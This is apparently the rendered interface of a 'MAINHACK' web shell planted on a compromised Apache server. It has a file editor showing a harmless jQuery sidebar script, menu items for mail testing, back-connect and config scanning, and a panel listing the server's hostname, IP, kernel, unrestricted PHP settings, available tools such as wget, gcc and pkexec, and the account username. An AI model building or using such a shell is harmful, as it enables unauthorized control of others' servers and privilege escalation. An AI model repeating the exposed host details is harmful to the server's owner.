[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: new-script.js
(function ($) { "use strict"; const win = $(window); const bodyElement = $("body"); /** * Perfect Scrollbar */ const ps = new PerfectScrollbar(".sidebar-menu", { wheelSpeed: 2, wheelPropagation: true, minScrollbarLength: 20, }); ps.update(); /** * Active ToolTips */ let tooltipTriggerList = [].slice.call( document.querySelectorAll('[data-bs-toggle="tooltip"]') ); let tooltipList = tooltipTriggerList.map(function (tooltipTriggerEl) { return new bootstrap.Tooltip(tooltipTriggerEl); }); /*** * Hide Preloader */ win.on("load", () => { setTimeout(() => { $(".main-preloader").fadeOut(500); }, 500); }); /** * Click to show Menus for mobile devices */ bodyElement.on("click", ".om", function () { bodyElement.find(".screen-list").addClass("active"); }); $(document).on("click", function (event) { if ($(event.target).closest(".om").length === 0) { bodyElement.find(".screen-list").removeClass("active"); } }); /** * Open Sidebar When Active Arabic Language */ bodyElement.on("click", ".st", function () { bodyElement.find(".main-sidebar2").addClass("active"); }); $(document).on("click", function (e) { if ( $(e.target).closest(".st").length === 0 && $(e.target).closest(".sidebar-menu").length === 0 ) { bodyElement.find(".main-sidebar2").removeClass("active"); } }); /** * Language Dropdown */ // bodyElement.on("click", ".lang-dropdown-menu li", function () { // bodyElement // .find(".show-drop-result") // .html( // `<i class="currency-flag currency-flag-${$(this).attr( // "data-icon" // )}"></i> <span>${$(this).attr("data-lang")}</span>` // ); // }); })(jQuery);
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.9 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002